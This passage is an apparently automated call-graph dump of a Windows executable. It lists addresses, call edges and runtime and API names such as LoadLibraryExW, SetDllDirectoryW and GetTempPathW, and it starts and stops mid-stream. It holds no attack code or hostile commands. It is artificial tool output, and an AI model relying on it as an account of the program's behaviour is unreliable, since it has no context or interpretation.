7ff65e29b2c5 16749->16752 16753 7ff65e29b26c 16750->16753 16763 7ff65e2a22c4 16751->16763 16754 7ff65e29b28a FlsSetValue 16753->16754 16755 7ff65e29b27a FlsSetValue 16753->16755 16757 7ff65e29b296 FlsSetValue 16754->16757 16758 7ff65e29b2a8 16754->16758 16756 7ff65e29b283 16755->16756 16760 7ff65e29a948 __free_lconv_mon 11 API calls 16756->16760 16757->16756 16759 7ff65e29aef4 _get_daylight 11 API calls 16758->16759 16761 7ff65e29b2b0 16759->16761 16760->16746 16762 7ff65e29a948 __free_lconv_mon 11 API calls 16761->16762 16762->16751 16786 7ff65e2a2534 16763->16786 16765 7ff65e2a22f9 16801 7ff65e2a1fc4 16765->16801 16768 7ff65e29d5fc _fread_nolock 12 API calls 16769 7ff65e2a2327 16768->16769 16770 7ff65e2a232f 16769->16770 16772 7ff65e2a233e 16769->16772 16771 7ff65e29a948 __free_lconv_mon 11 API calls 16770->16771 16784 7ff65e2a2316 16771->16784 16772->16772 16808 7ff65e2a266c 16772->16808 16775 7ff65e2a243a 16776 7ff65e294f08 _get_daylight 11 API calls 16775->16776 16778 7ff65e2a243f 16776->16778 16777 7ff65e2a2495 16785 7ff65e2a24fc 16777->16785 16819 7ff65e2a1df4 16777->16819 16780 7ff65e29a948 __free_lconv_mon 11 API calls 16778->16780 16779 7ff65e2a2454 16779->16777 16781 7ff65e29a948 __free_lconv_mon 11 API calls 16779->16781 16780->16784 16781->16777 16783 7ff65e29a948 __free_lconv_mon 11 API calls 16783->16784 16784->16699 16785->16783 16787 7ff65e2a2557 16786->16787 16790 7ff65e2a2561 16787->16790 16834 7ff65e2a02d8 EnterCriticalSection 16787->16834 16789 7ff65e2a25d3 16789->16765 16790->16789 16793 7ff65e29a504 __CxxCallCatchBlock 45 API calls 16790->16793 16794 7ff65e2a25eb 16793->16794 16797 7ff65e2a2642 16794->16797 16798 7ff65e29b224 50 API calls 16794->16798 16797->16765 16799 7ff65e2a262c 16798->16799 16800 7ff65e2a22c4 65 API calls 16799->16800 16800->16797 16802 7ff65e294f4c 45 API calls 16801->16802 16803 7ff65e2a1fd8 16802->16803 16804 7ff65e2a1fe4 GetOEMCP 16803->16804 16805 7ff65e2a1ff6 16803->16805 16806 7ff65e2a200b 16804->16806 
16805->16806 16807 7ff65e2a1ffb GetACP 16805->16807 16806->16768 16806->16784 16807->16806 16809 7ff65e2a1fc4 47 API calls 16808->16809 16810 7ff65e2a2699 16809->16810 16811 7ff65e2a27ef 16810->16811 16812 7ff65e2a26d6 IsValidCodePage 16810->16812 16818 7ff65e2a26f0 __scrt_get_show_window_mode 16810->16818 16813 7ff65e28c550 _log10_special 8 API calls 16811->16813 16812->16811 16814 7ff65e2a26e7 16812->16814 16815 7ff65e2a2431 16813->16815 16816 7ff65e2a2716 GetCPInfo 16814->16816 16814->16818 16815->16775 16815->16779 16816->16811 16816->16818 16835 7ff65e2a20dc 16818->16835 16922 7ff65e2a02d8 EnterCriticalSection 16819->16922 16836 7ff65e2a2119 GetCPInfo 16835->16836 16845 7ff65e2a220f 16835->16845 16842 7ff65e2a212c 16836->16842 16836->16845 16837 7ff65e28c550 _log10_special 8 API calls 16839 7ff65e2a22ae 16837->16839 16839->16811 16846 7ff65e2a2e40 16842->16846 16845->16837 16847 7ff65e294f4c 45 API calls 16846->16847 16848 7ff65e2a2e82 16847->16848 16866 7ff65e29f8a0 16848->16866 16868 7ff65e29f8a9 MultiByteToWideChar 16866->16868 16924 7ff65e299349 16923->16924 16925 7ff65e2994ad 16923->16925 16924->16739 16926 7ff65e2994d6 16925->16926 16927 7ff65e29a948 __free_lconv_mon 11 API calls 16925->16927 16928 7ff65e29a948 __free_lconv_mon 11 API calls 16926->16928 16927->16925 16928->16924 16930 7ff65e2a62c1 16929->16930 16931 7ff65e2a62d8 16929->16931 16932 7ff65e294f08 _get_daylight 11 API calls 16930->16932 16931->16930 16933 7ff65e2a62e6 16931->16933 16934 7ff65e2a62c6 16932->16934 16936 7ff65e294f4c 45 API calls 16933->16936 16937 7ff65e2a62d1 16933->16937 16935 7ff65e29a8e0 _invalid_parameter_noinfo 37 API calls 16934->16935 16935->16937 16936->16937 16937->16575 16939 7ff65e294f4c 45 API calls 16938->16939 16940 7ff65e2a8f71 16939->16940 16943 7ff65e2a8bc8 16940->16943 16946 7ff65e2a8c16 16943->16946 16944 7ff65e28c550 _log10_special 8 API calls 16945 7ff65e2a7205 16944->16945 16945->16575 16945->16601 16947 7ff65e2a8c9d 16946->16947 16949 7ff65e2a8c88 
GetCPInfo 16946->16949 16952 7ff65e2a8ca1 16946->16952 16948 7ff65e29f8a0 _fread_nolock MultiByteToWideChar 16947->16948 16947->16952 16950 7ff65e2a8d35 16948->16950 16949->16947 16949->16952 16951 7ff65e29d5fc _fread_nolock 12 API calls 16950->16951 16950->16952 16953 7ff65e2a8d6c 16950->16953 16951->16953 16952->16944 16953->16952 16954 7ff65e29f8a0 _fread_nolock MultiByteToWideChar 16953->16954 16955 7ff65e2a8dda 16954->16955 16956 7ff65e2a8ebc 16955->16956 16957 7ff65e29f8a0 _fread_nolock MultiByteToWideChar 16955->16957 16956->16952 16958 7ff65e29a948 __free_lconv_mon 11 API calls 16956->16958 16959 7ff65e2a8e00 16957->16959 16958->16952 16959->16956 16960 7ff65e29d5fc _fread_nolock 12 API calls 16959->16960 16961 7ff65e2a8e2d 16959->16961 16960->16961 16961->16956 16962 7ff65e29f8a0 _fread_nolock MultiByteToWideChar 16961->16962 16963 7ff65e2a8ea4 16962->16963 16964 7ff65e2a8ec4 16963->16964 16965 7ff65e2a8eaa 16963->16965 16972 7ff65e29ef68 16964->16972 16965->16956 16968 7ff65e29a948 __free_lconv_mon 11 API calls 16965->16968 16968->16956 16969 7ff65e2a8f03 16969->16952 16971 7ff65e29a948 __free_lconv_mon 11 API calls 16969->16971 16970 7ff65e29a948 __free_lconv_mon 11 API calls 16970->16969 16971->16952 16973 7ff65e29ed10 __crtLCMapStringW 5 API calls 16972->16973 16974 7ff65e29efa6 16973->16974 16975 7ff65e29efae 16974->16975 16976 7ff65e29f1d0 __crtLCMapStringW 5 API calls 16974->16976 16975->16969 16975->16970 16977 7ff65e29f017 CompareStringW 16976->16977 16977->16975 16979 7ff65e2a7c41 16978->16979 16980 7ff65e2a7c5a HeapSize 16978->16980 16981 7ff65e294f08 _get_daylight 11 API calls 16979->16981 16982 7ff65e2a7c46 16981->16982 16983 7ff65e29a8e0 _invalid_parameter_noinfo 37 API calls 16982->16983 16984 7ff65e2a7c51 16983->16984 16984->16606 16986 7ff65e2a7c93 16985->16986 16987 7ff65e2a7c89 16985->16987 16988 7ff65e2a7c98 16986->16988 16995 7ff65e2a7c9f _get_daylight 16986->16995 16989 7ff65e29d5fc _fread_nolock 12 API calls 16987->16989 16990 
7ff65e29a948 __free_lconv_mon 11 API calls 16988->16990 16993 7ff65e2a7c91 16989->16993 16990->16993 16991 7ff65e2a7cd2 HeapReAlloc 16991->16993 16991->16995 16992 7ff65e2a7ca5 16994 7ff65e294f08 _get_daylight 11 API calls 16992->16994 16993->16610 16994->16993 16995->16991 16995->16992 16996 7ff65e2a3590 _get_daylight 2 API calls 16995->16996 16996->16995 16998 7ff65e29ed10 __crtLCMapStringW 5 API calls 16997->16998 16999 7ff65e29ef44 16998->16999 16999->16614 17001 7ff65e2954d6 17000->17001 17002 7ff65e2954fa 17000->17002 17005 7ff65e29a948 __free_lconv_mon 11 API calls 17001->17005 17009 7ff65e2954e5 17001->17009 17003 7ff65e2954ff 17002->17003 17004 7ff65e295554 17002->17004 17007 7ff65e295514 17003->17007 17003->17009 17010 7ff65e29a948 __free_lconv_mon 11 API calls 17003->17010 17006 7ff65e29f8a0 _fread_nolock MultiByteToWideChar 17004->17006 17005->17009 17016 7ff65e295570 17006->17016 17011 7ff65e29d5fc _fread_nolock 12 API calls 17007->17011 17008 7ff65e295577 GetLastError 17012 7ff65e294e7c _fread_nolock 11 API calls 17008->17012 17009->16618 17009->16619 17010->17007 17011->17009 17014 7ff65e295584 17012->17014 17013 7ff65e2955b2 17013->17009 17017 7ff65e29f8a0 _fread_nolock MultiByteToWideChar 17013->17017 17019 7ff65e294f08 _get_daylight 11 API calls 17014->17019 17015 7ff65e2955a5 17021 7ff65e29d5fc _fread_nolock 12 API calls 17015->17021 17016->17008 17016->17013 17016->17015 17020 7ff65e29a948 __free_lconv_mon 11 API calls 17016->17020 17018 7ff65e2955f6 17017->17018 17018->17008 17018->17009 17019->17009 17020->17015 17021->17013 17023 7ff65e299225 17022->17023 17030 7ff65e299221 17022->17030 17043 7ff65e2a2a3c GetEnvironmentStringsW 17023->17043 17026 7ff65e29923e 17050 7ff65e29938c 17026->17050 17027 7ff65e299232 17028 7ff65e29a948 __free_lconv_mon 11 API calls 17027->17028 17028->17030 17030->16646 17035 7ff65e2995cc 17030->17035 17032 7ff65e29a948 __free_lconv_mon 11 API calls 17033 7ff65e299265 17032->17033 17034 7ff65e29a948 __free_lconv_mon 
11 API calls 17033->17034 17034->17030 17036 7ff65e299606 17035->17036 17037 7ff65e2995ef 17035->17037 17036->17037 17038 7ff65e29eb98 _get_daylight 11 API calls 17036->17038 17039 7ff65e29967a 17036->17039 17040 7ff65e29f8a0 MultiByteToWideChar _fread_nolock 17036->17040 17042 7ff65e29a948 __free_lconv_mon 11 API calls 17036->17042 17037->16646 17038->17036 17041 7ff65e29a948 __free_lconv_mon 11 API calls 17039->17041 17040->17036 17041->17037 17042->17036 17044 7ff65e2a2a60 17043->17044 17045 7ff65e29922a 17043->17045 17046 7ff65e29d5fc _fread_nolock 12 API calls 17044->17046 17045->17026 17045->17027 17047 7ff65e2a2a97 memcpy_s 17046->17047 17048 7ff65e29a948 __free_lconv_mon 11 API calls 17047->17048 17049 7ff65e2a2ab7 FreeEnvironmentStringsW 17048->17049 17049->17045 17051 7ff65e2993b4 17050->17051 17052 7ff65e29eb98 _get_daylight 11 API calls 17051->17052 17061 7ff65e2993ef 17052->17061 17053 7ff65e29a948 __free_lconv_mon 11 API calls 17054 7ff65e299246 17053->17054 17054->17032 17055 7ff65e299471 17056 7ff65e29a948 __free_lconv_mon 11 API calls 17055->17056 17056->17054 17057 7ff65e29eb98 _get_daylight 11 API calls 17057->17061 17058 7ff65e299460 17060 7ff65e2994a8 11 API calls 17058->17060 17059 7ff65e2a0474 37 API calls 17059->17061 17062 7ff65e299468 17060->17062 17061->17055 17061->17057 17061->17058 17061->17059 17063 7ff65e299494 17061->17063 17066 7ff65e29a948 __free_lconv_mon 11 API calls 17061->17066 17067 7ff65e2993f7 17061->17067 17064 7ff65e29a948 __free_lconv_mon 11 API calls 17062->17064 17065 7ff65e29a900 _isindst 17 API calls 17063->17065 17064->17067 17068 7ff65e2994a6 17065->17068 17066->17061 17067->17053 17070 7ff65e2a8b31 __crtLCMapStringW 17069->17070 17071 7ff65e29ef68 6 API calls 17070->17071 17072 7ff65e2a70ee 17070->17072 17071->17072 17072->16673 17072->16674 17073 7ff65e28cc3c 17094 7ff65e28ce0c 17073->17094 17076 7ff65e28cd88 17248 7ff65e28d12c IsProcessorFeaturePresent 17076->17248 17077 7ff65e28cc58 __scrt_acquire_startup_lock 
17079 7ff65e28cd92 17077->17079 17086 7ff65e28cc76 __scrt_release_startup_lock 17077->17086 17080 7ff65e28d12c 7 API calls 17079->17080 17082 7ff65e28cd9d __CxxCallCatchBlock 17080->17082 17081 7ff65e28cc9b 17083 7ff65e28cd21 17100 7ff65e28d274 17083->17100 17085 7ff65e28cd26 17103 7ff65e281000 17085->17103 17086->17081 17086->17083 17237 7ff65e299b2c 17086->17237 17092 7ff65e28cd49 17092->17082 17244 7ff65e28cf90 17092->17244 17095 7ff65e28ce14 17094->17095 17096 7ff65e28ce20 __scrt_dllmain_crt_thread_attach 17095->17096 17097 7ff65e28cc50 17096->17097 17098 7ff65e28ce2d 17096->17098 17097->17076 17097->17077 17098->17097 17255 7ff65e28d888 17098->17255 17101 7ff65e2aa4d0 __scrt_get_show_window_mode 17100->17101 17102 7ff65e28d28b GetStartupInfoW 17101->17102 17102->17085 17104 7ff65e281009 17103->17104 17282 7ff65e295484 17104->17282 17106 7ff65e2837fb 17289 7ff65e2836b0 17106->17289 17110 7ff65e28c550 _log10_special 8 API calls 17112 7ff65e283ca7 17110->17112 17242 7ff65e28d2b8 GetModuleHandleW 17112->17242 17113 7ff65e28383c 17456 7ff65e281c80 17113->17456 17114 7ff65e28391b 17465 7ff65e2845c0 17114->17465 17118 7ff65e28385b 17361 7ff65e288830 17118->17361 17119 7ff65e28396a 17488 7ff65e282710 17119->17488 17121 7ff65e28388e 17131 7ff65e2838bb __vcrt_freefls 17121->17131 17460 7ff65e2889a0 17121->17460 17124 7ff65e28395d 17125 7ff65e283984 17124->17125 17126 7ff65e283962 17124->17126 17129 7ff65e281c80 49 API calls 17125->17129 17484 7ff65e29004c 17126->17484 17130 7ff65e2839a3 17129->17130 17135 7ff65e281950 115 API calls 17130->17135 17132 7ff65e288830 14 API calls 17131->17132 17140 7ff65e2838de __vcrt_freefls 17131->17140 17132->17140 17133 7ff65e288940 40 API calls 17134 7ff65e283a0b 17133->17134 17136 7ff65e2889a0 40 API calls 17134->17136 17137 7ff65e2839ce 17135->17137 17138 7ff65e283a17 17136->17138 17137->17118 17139 7ff65e2839de 17137->17139 17141 7ff65e2889a0 40 API calls 17138->17141 17143 7ff65e282710 54 API calls 17139->17143 17140->17133 17145 
7ff65e28390e __vcrt_freefls 17140->17145 17142 7ff65e283a23 17141->17142 17144 7ff65e2889a0 40 API calls 17142->17144 17184 7ff65e283808 __vcrt_freefls 17143->17184 17144->17145 17146 7ff65e288830 14 API calls 17145->17146 17147 7ff65e283a3b 17146->17147 17148 7ff65e283b2f 17147->17148 17149 7ff65e283a60 __vcrt_freefls 17147->17149 17150 7ff65e282710 54 API calls 17148->17150 17156 7ff65e283aab 17149->17156 17374 7ff65e288940 17149->17374 17150->17184 17152 7ff65e288830 14 API calls 17153 7ff65e283bf4 __vcrt_freefls 17152->17153 17154 7ff65e283c46 17153->17154 17155 7ff65e283d41 17153->17155 17157 7ff65e283cd4 17154->17157 17158 7ff65e283c50 17154->17158 17499 7ff65e2844e0 17155->17499 17156->17152 17161 7ff65e288830 14 API calls 17157->17161 17381 7ff65e2890e0 17158->17381 17164 7ff65e283ce0 17161->17164 17162 7ff65e283d4f 17165 7ff65e283d65 17162->17165 17166 7ff65e283d71 17162->17166 17170 7ff65e283ced 17164->17170 17177 7ff65e283c61 17164->17177 17502 7ff65e284630 17165->17502 17167 7ff65e281c80 49 API calls 17166->17167 17178 7ff65e283cc8 __vcrt_freefls 17167->17178 17171 7ff65e281c80 49 API calls 17170->17171 17175 7ff65e283d0b 17171->17175 17172 7ff65e283dc4 17431 7ff65e289390 17172->17431 17174 7ff65e282710 54 API calls 17174->17184 17175->17178 17179 7ff65e283d12 17175->17179 17177->17174 17178->17172 17180 7ff65e283da7 SetDllDirectoryW LoadLibraryExW 17178->17180 17182 7ff65e282710 54 API calls 17179->17182 17180->17172 17181 7ff65e283dd7 SetDllDirectoryW 17185 7ff65e283e0a 17181->17185 17226 7ff65e283e5a 17181->17226 17182->17184 17184->17110 17187 7ff65e288830 14 API calls 17185->17187 17186 7ff65e284008 17189 7ff65e284035 17186->17189 17190 7ff65e284012 PostMessageW GetMessageW 17186->17190 17194 7ff65e283e16 __vcrt_freefls 17187->17194 17188 7ff65e283f1b 17436 7ff65e2833c0 17188->17436 17579 7ff65e283360 17189->17579 17190->17189 17196 7ff65e283ef2 17194->17196 17200 7ff65e283e4e 17194->17200 17199 7ff65e288940 40 API calls 17196->17199 17199->17226 
17200->17226 17505 7ff65e286dc0 17200->17505 17226->17186 17226->17188 17238 7ff65e299b43 17237->17238 17239 7ff65e299b64 17237->17239 17238->17083 17240 7ff65e29a3d8 45 API calls 17239->17240 17241 7ff65e299b69 17240->17241 17243 7ff65e28d2c9 17242->17243 17243->17092 17246 7ff65e28cfa1 17244->17246 17245 7ff65e28cd60 17245->17081 17246->17245 17247 7ff65e28d888 7 API calls 17246->17247 17247->17245 17249 7ff65e28d152 __CxxCallCatchBlock __scrt_get_show_window_mode 17248->17249 17250 7ff65e28d171 RtlCaptureContext RtlLookupFunctionEntry 17249->17250 17251 7ff65e28d1d6 __scrt_get_show_window_mode 17250->17251 17252 7ff65e28d19a RtlVirtualUnwind 17250->17252 17253 7ff65e28d208 IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 17251->17253 17252->17251 17254 7ff65e28d256 __CxxCallCatchBlock 17253->17254 17254->17079 17256 7ff65e28d890 17255->17256 17257 7ff65e28d89a 17255->17257 17261 7ff65e28dc24 17256->17261 17257->17097 17262 7ff65e28d895 17261->17262 17263 7ff65e28dc33 17261->17263 17265 7ff65e28dc90 17262->17265 17269 7ff65e28de60 17263->17269 17266 7ff65e28dcbb 17265->17266 17267 7ff65e28dc9e DeleteCriticalSection 17266->17267 17268 7ff65e28dcbf 17266->17268 17267->17266 17268->17257 17273 7ff65e28dcc8 17269->17273 17279 7ff65e28ddb2 TlsFree 17273->17279 17280 7ff65e28dd0c __vcrt_FlsAlloc 17273->17280 17274 7ff65e28dd3a LoadLibraryExW 17276 7ff65e28ddd9 17274->17276 17277 7ff65e28dd5b GetLastError 17274->17277 17275 7ff65e28ddf9 GetProcAddress 17275->17279 17276->17275 17278 7ff65e28ddf0 FreeLibrary 17276->17278 17277->17280 17278->17275 17280->17274 17280->17275 17280->17279 17281 7ff65e28dd7d LoadLibraryExW 17280->17281 17281->17276 17281->17280 17284 7ff65e29f480 17282->17284 17283 7ff65e29a814 _invalid_parameter_noinfo 37 API calls 17288 7ff65e29f4fc 17283->17288 17285 7ff65e29f526 17284->17285 17286 7ff65e29f4d3 17284->17286 17592 7ff65e29f358 17285->17592 17286->17283 17288->17106 17600 7ff65e28c850 17289->17600 17292 7ff65e2836eb 
GetLastError 17607 7ff65e282c50 17292->17607 17293 7ff65e283710 17602 7ff65e289280 FindFirstFileExW 17293->17602 17296 7ff65e283706 17301 7ff65e28c550 _log10_special 8 API calls 17296->17301 17298 7ff65e28377d 17633 7ff65e289440 17298->17633 17299 7ff65e283723 17622 7ff65e289300 CreateFileW 17299->17622 17304 7ff65e2837b5 17301->17304 17303 7ff65e28378b 17303->17296 17308 7ff65e282810 49 API calls 17303->17308 17304->17184 17311 7ff65e281950 17304->17311 17306 7ff65e28374c __vcrt_FlsAlloc 17306->17298 17307 7ff65e283734 17625 7ff65e282810 17307->17625 17308->17296 17312 7ff65e2845c0 108 API calls 17311->17312 17313 7ff65e281985 17312->17313 17315 7ff65e287f90 83 API calls 17313->17315 17321 7ff65e281c43 17313->17321 17314 7ff65e28c550 _log10_special 8 API calls 17317 7ff65e281c5e 17314->17317 17316 7ff65e2819cb 17315->17316 17360 7ff65e281a03 17316->17360 17978 7ff65e2906d4 17316->17978 17317->17113 17317->17114 17319 7ff65e29004c 74 API calls 17319->17321 17320 7ff65e2819e5 17322 7ff65e2819e9 17320->17322 17323 7ff65e281a08 17320->17323 17321->17314 17324 7ff65e294f08 _get_daylight 11 API calls 17322->17324 17982 7ff65e29039c 17323->17982 17326 7ff65e2819ee 17324->17326 17985 7ff65e282910 17326->17985 17329 7ff65e281a26 17331 7ff65e294f08 _get_daylight 11 API calls 17329->17331 17330 7ff65e281a45 17333 7ff65e281a5c 17330->17333 17334 7ff65e281a7b 17330->17334 17332 7ff65e281a2b 17331->17332 17335 7ff65e282910 54 API calls 17332->17335 17336 7ff65e294f08 _get_daylight 11 API calls 17333->17336 17337 7ff65e281c80 49 API calls 17334->17337 17335->17360 17338 7ff65e281a61 17336->17338 17339 7ff65e281a92 17337->17339 17340 7ff65e282910 54 API calls 17338->17340 17341 7ff65e281c80 49 API calls 17339->17341 17340->17360 17342 7ff65e281add 17341->17342 17343 7ff65e2906d4 73 API calls 17342->17343 17344 7ff65e281b01 17343->17344 17345 7ff65e281b16 17344->17345 17346 7ff65e281b35 17344->17346 17347 7ff65e294f08 _get_daylight 11 API calls 17345->17347 17348 7ff65e29039c 
_fread_nolock 53 API calls 17346->17348 17349 7ff65e281b1b 17347->17349 17350 7ff65e281b4a 17348->17350 17351 7ff65e282910 54 API calls 17349->17351 17352 7ff65e281b50 17350->17352 17353 7ff65e281b6f 17350->17353 17351->17360 17355 7ff65e294f08 _get_daylight 11 API calls 17352->17355 18000 7ff65e290110 17353->18000 17357 7ff65e281b55 17355->17357 17358 7ff65e282910 54 API calls 17357->17358 17358->17360 17359 7ff65e282710 54 API calls 17359->17360 17360->17319 17362 7ff65e28883a 17361->17362 17363 7ff65e289390 2 API calls 17362->17363 17364 7ff65e288859 GetEnvironmentVariableW 17363->17364 17365 7ff65e2888c2 17364->17365 17366 7ff65e288876 ExpandEnvironmentStringsW 17364->17366 17368 7ff65e28c550 _log10_special 8 API calls 17365->17368 17366->17365 17367 7ff65e288898 17366->17367 17369 7ff65e289440 2 API calls 17367->17369 17370 7ff65e2888d4 17368->17370 17371 7ff65e2888aa 17369->17371 17370->17121 17372 7ff65e28c550 _log10_special 8 API calls 17371->17372 17373 7ff65e2888ba 17372->17373 17373->17121 17375 7ff65e289390 2 API calls 17374->17375 17376 7ff65e28895c 17375->17376 17377 7ff65e289390 2 API calls 17376->17377 17378 7ff65e28896c 17377->17378 18215 7ff65e298238 17378->18215 17380 7ff65e28897a __vcrt_freefls 17380->17156 17382 7ff65e2890f5 17381->17382 18233 7ff65e288570 GetCurrentProcess OpenProcessToken 17382->18233 17385 7ff65e288570 7 API calls 17386 7ff65e289121 17385->17386 17387 7ff65e289154 17386->17387 17388 7ff65e28913a 17386->17388 17389 7ff65e2826b0 48 API calls 17387->17389 17390 7ff65e2826b0 48 API calls 17388->17390 17392 7ff65e289167 LocalFree LocalFree 17389->17392 17391 7ff65e289152 17390->17391 17391->17392 17393 7ff65e289183 17392->17393 17395 7ff65e28918f 17392->17395 18243 7ff65e282b50 17393->18243 17396 7ff65e28c550 _log10_special 8 API calls 17395->17396 17397 7ff65e283c55 17396->17397 17397->17177 17398 7ff65e288660 17397->17398 17399 7ff65e288678 17398->17399 17400 7ff65e2886fa GetTempPathW GetCurrentProcessId 17399->17400 17401 
16250 7ff65e295948 16247->16250 16249 7ff65e295961 SystemTimeToTzSpecificLocalTime 16248->16249 16248->16250 16249->16250 16251 7ff65e28c550 _log10_special 8 API calls 16250->16251 16252 7ff65e295839 16251->16252 16252->16198 16254 7ff65e297e92 16253->16254 16255 7ff65e297e24 16253->16255 16290 7ff65e2a07c0 16254->16290 16255->16254 16257 7ff65e297e29 16255->16257 16258 7ff65e297e5e 16257->16258 16259 7ff65e297e41 16257->16259 16273 7ff65e297c4c GetFullPathNameW 16258->16273 16265 7ff65e297bd8 GetFullPathNameW 16259->16265 16264 7ff65e297e56 __vcrt_freefls 16264->16212 16266 7ff65e297bfe GetLastError 16265->16266 16267 7ff65e297c14 16265->16267 16268 7ff65e294e7c _fread_nolock 11 API calls 16266->16268 16271 7ff65e294f08 _get_daylight 11 API calls 16267->16271 16272 7ff65e297c10 16267->16272 16269 7ff65e297c0b 16268->16269 16270 7ff65e294f08 _get_daylight 11 API calls 16269->16270 16270->16272 16271->16272 16272->16264 16274 7ff65e297c7f GetLastError 16273->16274 16277 7ff65e297c95 __vcrt_freefls 16273->16277 16275 7ff65e294e7c _fread_nolock 11 API calls 16274->16275 16276 7ff65e297c8c 16275->16276 16278 7ff65e294f08 _get_daylight 11 API calls 16276->16278 16279 7ff65e297cef GetFullPathNameW 16277->16279 16280 7ff65e297c91 16277->16280 16278->16280 16279->16274 16279->16280 16281 7ff65e297d24 16280->16281 16285 7ff65e297d98 memcpy_s 16281->16285 16286 7ff65e297d4d __scrt_get_show_window_mode 16281->16286 16282 7ff65e297d81 16283 7ff65e294f08 _get_daylight 11 API calls 16282->16283 16284 7ff65e297d86 16283->16284 16287 7ff65e29a8e0 _invalid_parameter_noinfo 37 API calls 16284->16287 16285->16264 16286->16282 16286->16285 16288 7ff65e297dba 16286->16288 16287->16285 16288->16285 16289 7ff65e294f08 _get_daylight 11 API calls 16288->16289 16289->16284 16293 7ff65e2a05d0 16290->16293 16294 7ff65e2a0612 16293->16294 16295 7ff65e2a05fb 16293->16295 16297 7ff65e2a0637 16294->16297 16298 7ff65e2a0616 16294->16298 16296 7ff65e294f08 _get_daylight 11 API calls 16295->16296 
16311 7ff65e2a0600 16296->16311 16331 7ff65e29f5b8 16297->16331 16319 7ff65e2a073c 16298->16319 16301 7ff65e2a063c 16306 7ff65e2a06e1 16301->16306 16314 7ff65e2a0663 16301->16314 16303 7ff65e29a8e0 _invalid_parameter_noinfo 37 API calls 16318 7ff65e2a060b __vcrt_freefls 16303->16318 16304 7ff65e2a061f 16305 7ff65e294ee8 _fread_nolock 11 API calls 16304->16305 16307 7ff65e2a0624 16305->16307 16306->16295 16308 7ff65e2a06e9 16306->16308 16310 7ff65e294f08 _get_daylight 11 API calls 16307->16310 16312 7ff65e297bd8 13 API calls 16308->16312 16309 7ff65e28c550 _log10_special 8 API calls 16313 7ff65e2a0731 16309->16313 16310->16311 16311->16303 16312->16318 16313->16264 16315 7ff65e297c4c 14 API calls 16314->16315 16316 7ff65e2a06a7 16315->16316 16317 7ff65e297d24 37 API calls 16316->16317 16316->16318 16317->16318 16318->16309 16320 7ff65e2a0786 16319->16320 16321 7ff65e2a0756 16319->16321 16322 7ff65e2a0791 GetDriveTypeW 16320->16322 16323 7ff65e2a0771 16320->16323 16324 7ff65e294ee8 _fread_nolock 11 API calls 16321->16324 16322->16323 16327 7ff65e28c550 _log10_special 8 API calls 16323->16327 16325 7ff65e2a075b 16324->16325 16326 7ff65e294f08 _get_daylight 11 API calls 16325->16326 16328 7ff65e2a0766 16326->16328 16329 7ff65e2a061b 16327->16329 16330 7ff65e29a8e0 _invalid_parameter_noinfo 37 API calls 16328->16330 16329->16301 16329->16304 16330->16323 16345 7ff65e2aa4d0 16331->16345 16333 7ff65e29f5ee GetCurrentDirectoryW 16334 7ff65e29f605 16333->16334 16335 7ff65e29f62c 16333->16335 16337 7ff65e28c550 _log10_special 8 API calls 16334->16337 16336 7ff65e29eb98 _get_daylight 11 API calls 16335->16336 16338 7ff65e29f63b 16336->16338 16339 7ff65e29f699 16337->16339 16340 7ff65e29f645 GetCurrentDirectoryW 16338->16340 16341 7ff65e29f654 16338->16341 16339->16301 16340->16341 16342 7ff65e29f659 16340->16342 16343 7ff65e294f08 _get_daylight 11 API calls 16341->16343 16344 7ff65e29a948 __free_lconv_mon 11 API calls 16342->16344 16343->16342 16344->16334 16346 7ff65e2aa4c0 
16345->16346 16346->16333 16346->16346 16348 7ff65e29f755 16347->16348 16349 7ff65e29f731 16347->16349 16351 7ff65e29f78f 16348->16351 16354 7ff65e29f7ae 16348->16354 16349->16348 16350 7ff65e29f736 16349->16350 16352 7ff65e294f08 _get_daylight 11 API calls 16350->16352 16353 7ff65e294f08 _get_daylight 11 API calls 16351->16353 16355 7ff65e29f73b 16352->16355 16356 7ff65e29f794 16353->16356 16364 7ff65e294f4c 16354->16364 16358 7ff65e29a8e0 _invalid_parameter_noinfo 37 API calls 16355->16358 16359 7ff65e29a8e0 _invalid_parameter_noinfo 37 API calls 16356->16359 16360 7ff65e29f746 16358->16360 16361 7ff65e29f79f 16359->16361 16360->16233 16361->16233 16362 7ff65e29f7bb 16362->16361 16363 7ff65e2a04dc 51 API calls 16362->16363 16363->16362 16365 7ff65e294f70 16364->16365 16366 7ff65e294f6b 16364->16366 16365->16366 16367 7ff65e29b150 __CxxCallCatchBlock 45 API calls 16365->16367 16366->16362 16368 7ff65e294f8b 16367->16368 16372 7ff65e29d984 16368->16372 16373 7ff65e294fae 16372->16373 16374 7ff65e29d999 16372->16374 16376 7ff65e29d9f0 16373->16376 16374->16373 16380 7ff65e2a3304 16374->16380 16377 7ff65e29da05 16376->16377 16379 7ff65e29da18 16376->16379 16377->16379 16393 7ff65e2a2650 16377->16393 16379->16366 16381 7ff65e29b150 __CxxCallCatchBlock 45 API calls 16380->16381 16382 7ff65e2a3313 16381->16382 16383 7ff65e2a335e 16382->16383 16392 7ff65e2a02d8 EnterCriticalSection 16382->16392 16383->16373 16394 7ff65e29b150 __CxxCallCatchBlock 45 API calls 16393->16394 16395 7ff65e2a2659 16394->16395 20624 7ff65e29c520 20635 7ff65e2a02d8 EnterCriticalSection 20624->20635 19949 7ff65e295410 19950 7ff65e29541b 19949->19950 19958 7ff65e29f2a4 19950->19958 19971 7ff65e2a02d8 EnterCriticalSection 19958->19971 19695 7ff65e29f98c 19696 7ff65e29fb7e 19695->19696 19698 7ff65e29f9ce _isindst 19695->19698 19697 7ff65e294f08 _get_daylight 11 API calls 19696->19697 19715 7ff65e29fb6e 19697->19715 19698->19696 19701 7ff65e29fa4e _isindst 19698->19701 19699 7ff65e28c550 
